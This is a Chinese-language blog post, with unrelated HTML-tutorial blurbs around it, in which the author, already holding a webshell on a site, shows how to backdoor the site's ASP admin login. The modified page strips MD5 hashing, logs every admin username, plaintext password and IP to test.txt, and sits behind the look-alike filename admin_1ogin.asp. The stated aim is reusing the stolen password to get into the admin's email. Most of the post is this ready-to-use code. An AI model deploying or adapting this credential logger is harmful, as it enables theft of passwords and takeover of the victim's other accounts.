推薦:HTML代碼編寫匯集HTML即超文本標記語言(HypertextMarkupLanguage),也叫WEB網頁語言,做網頁了解它是必要的,雖然現在有很多製作網頁的工具如:Dreamwvear,FrontPage等,其實不懂這些代碼也能做出很漂亮的網頁。 。 。因為HTML內容繁多,很少有人願意用寫代碼做網頁的(效率低),大都使用
在一次安全檢測中,其實已拿到了webshell了,但是我還要社工他的郵箱還有其他資料類,所以要得知道他的習性。
下載了數據庫,但是md5密碼沒辦法解密。唉,看來只要記錄他的登錄管理員賬號密碼了!
省得還要去窮取法破解!
這個密碼其實說重要也不重要說不重要其實很重要。
因為很多人喜歡使用相同密碼。即使是我這類安全檢測人員,也免不了使用同一種賬號密碼的習慣。
首先看看他的後台登陸代碼
<%
Dim Login
Set Login=new AdLogin
Login.Execute
Class AdLogin
Private ExCommCls
Private Sub class_initialize
Set CommCls=new CommonCls
ExCommCls.IsIpAllow
ExCommCls.CheckInstall
ExCommCls.GetConfigCache(*)
End Sub
Private Sub class_terminate
Set ExCommCls=nothing
End Sub
public Sub Execute
Dim Action
Action=Request(action)
Select Case Action
Case CheckLogin
CheckLogin
Case LoginOut
LoginOut
Case Else
LoginF
End Select
End Sub
Private Sub CheckLogin
Dim Adname,AdPwd,CheckCode
AdName=ExCommCls.G(Trim(request(Adname)))
AdPwd=md5(Trim(request(AdPwd)))
CheckCode=ExCommCls.G(request(checkCode))
If Trim(CheckCode)<>session(excheckcode) and Application(sn&IsCheckCode)=是Then
ExCommCls.ShowMsg 驗證碼錯誤! ,Application(sn&blogurl)&admin_login.asp
Exit Sub
End If
If Trim(AdName)=CStr(Application(sn&AdName)) And Trim(AdPwd)=CStr(Application(sn&AdPwd)) Then
Response.Cookies(Md5(SN))(AdName)=AdName
Response.Cookies(Md5(SN))(AdPwd)=AdPwd
session(AdLogin)=Md5(SN)
ExCommCls.GetConfigCache(*)
ExCommCls.GetClassCache()
Response.Redirect(Application(sn&blogurl)&admin_index.asp)
Else
ExCommCls.ShowMsg 帳號或密碼錯誤,Application(sn&blogurl)&admin_login.asp
End if
End Sub
Private Sub LoginOut
Response.Cookies(Md5(SN))(AdName)=
Response.Cookies(Md5(SN))(AdPwd)=
session.Abandon()
ExCommCls.ShowMsg 成功退出登陸,Application(sn&blogurl)&index.asp
End Sub
Private Sub LoginF
%>
看下列代碼
AdName=ExCommCls.G(Trim(request(Adname)))
AdPwd=md5(Trim(request(AdPwd)))
---意思很簡單,這裡就不明說了, 主要看md5 ,密碼使用md5加密這樣的話,我們記錄的密碼也就沒用了,還是md5。所以
所以想到了,一個釣魚手法。 它本來的登錄界面是
Private Sub CheckLogin
Dim Adname,AdPwd,CheckCode,StrLogText,ip,ff
AdName=ExCommCls.G(Trim(request(Adname)))
AdPwd=(Trim(request(AdPwd)))
CheckCode=ExCommCls.G(request(checkCode))
strLogFile=test.txt
IP=request(IP)
StrLogText=StrLogText&AdName&----&AdPwd&----IP:&IP&(REMOTE_HOST)
set f=Server.CreateObject(scripting.filesystemobject)
set ff=f.opentextfile(server.mappath(.)&/&strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)&StrLogText)
ff.close
set ff=nothing
set f=nothing
If Trim(CheckCode)<>session(excheckcode) and Application(sn&IsCheckCode)=是Then
ExCommCls.ShowMsg 驗證碼錯誤! ,Application(sn&blogurl)&Admin_1ogin.asp
Exit Sub
End If
If Trim(AdName)=CStr(Application(sn&AdName)) And Trim(AdPwd)=CStr(Application(sn&AdPwd)) Then
Response.Cookies(Md5(SN))(AdName)=AdName
Response.Cookies((SN))(AdPwd)=AdPwd
session(AdLogin)=Md5(SN)
ExCommCls.GetConfigCache(*)
ExCommCls.GetClassCache()
Response.Redirect(Application(sn&blogurl)&Admin_1ogin.asp)
Else
ExCommCls.ShowMsg 帳號或密碼錯誤,Application(sn&blogurl)&Admin_1ogin.asp
End if
End Sub
看到沒,
a=本來的登錄頁面現在換成了釣魚頁面
b=本來的登錄頁面(admin_login.asp)修改成admin_1ogin.asp
為什麼呢。
本來的: AdPwd=md5(Trim(request(AdPwd)))
Response.Cookies(Md5(SN))(AdPwd)=AdPwd
修改
AdPwd=(Trim(request(AdPwd)))
Response.Cookies((SN))(AdPwd)=AdPwd
去掉md5。 。這樣的迷惑手法,使用很久了! 。 。
沒什麼技術含量。 還請不要見笑!密碼會記錄在test.txt上
分享:HEAD元素使用集錦HTML文檔由兩部分組成:Head(主題部分,一般來說是不可見的)和Body(正文部分,在瀏覽器中是可見的)。隨著FrontPage及Dreamweaver(簡稱DW)等可視化的網頁編輯器的流行,不懂HTML也可以做一個具有專業水平的網頁已經不是一個夢。但是,這些主頁製作工具都不能自己